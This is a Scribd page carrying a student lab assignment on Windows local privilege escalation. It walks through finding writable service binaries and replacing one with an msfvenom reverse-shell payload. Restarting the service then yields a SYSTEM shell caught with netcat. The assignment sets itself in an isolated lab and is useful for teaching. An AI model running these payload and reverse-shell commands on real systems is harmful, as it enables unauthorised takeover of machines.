Scribd
Upload
10 views2 pages

Windows LPE Practical Assignment

The document outlines a practical assignment focused on exploiting improper Access Control Lists (ACLs) on Windows systems to achieve local elevation of privilege using Kali Linux tools. It details a step-by-step procedure including information gathering, identifying writable service binaries, modifying service binaries, restarting services, and confirming privilege escalation. The assignment emphasizes the importance of conducting such activities in a controlled environment and adhering to legal and ethical standards.

Uploaded by

aryangupta080704
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
10 views2 pages

Windows LPE Practical Assignment

The document outlines a practical assignment focused on exploiting improper Access Control Lists (ACLs) on Windows systems to achieve local elevation of privilege using Kali Linux tools. It details a step-by-step procedure including information gathering, identifying writable service binaries, modifying service binaries, restarting services, and confirming privilege escalation. The assignment emphasizes the importance of conducting such activities in a controlled environment and adhering to legal and ethical standards.

Uploaded by

aryangupta080704
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Practical Assignment

Topic: Exploiting the Windows Access Control Model for Local Elevation of
Privilege

Objective:
To understand and demonstrate how improper Access Control Lists (ACLs) on Windows
systems can be exploited to gain elevated privileges using practical tools available in Kali
Linux.

Requirements:

- A Windows virtual machine (target)​
- Kali Linux virtual machine (attacker)​
- Meterpreter or nc for reverse shell​
- Exploitable Windows service or weak ACL configuration​
- Windows user account with limited privileges​

Step-by-Step Procedure:
1.​ Step 1: Information Gathering


- Start with a reverse shell to the Windows machine (assume you already have a
low-privileged session).​
- Use Meterpreter:​
meterpreter > getuid​
meterpreter > sysinfo

2.​ Step 2: Check for Writable Service Binaries


Use the PowerShell command or accesschk (Sysinternals) to identify services with weak
permissions:​
> sc qc [ServiceName]​
> accesschk.exe -uwcqv "username" * /accepteula​
3.​ Step 3: Modify the Service Binary


If you find a service binary path that is writable, replace it with your malicious payload:​
$ msfvenom -p windows/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe -o
revshell.exe​
$ cp revshell.exe "\\target\c$\Program Files\VulnerableService\vulnsvc.exe"​

4.​ Step 4: Restart the Service


Restart the service to trigger the payload:​
> net stop [ServiceName]​
> net start [ServiceName]​

5.​ Step 5: Catch the Shell


On Kali, listen using Netcat or Metasploit:​
$ nc -lvnp 4444​

6.​ Step 6: Privilege Escalation Confirmed


Check privileges:​
> whoami​
> net session (should return output only if SYSTEM/admin)​

Security Precautions:

- This activity should only be conducted in an isolated lab environment.​
- Never perform privilege escalation on production systems without permission.​
- Always use legal and ethical practices.​

Conclusion:

Improper file or folder permissions on Windows services can lead to serious privilege
escalation risks. ​
This practical demonstrated how to exploit such misconfigurations using Kali Linux tools.​

You might also like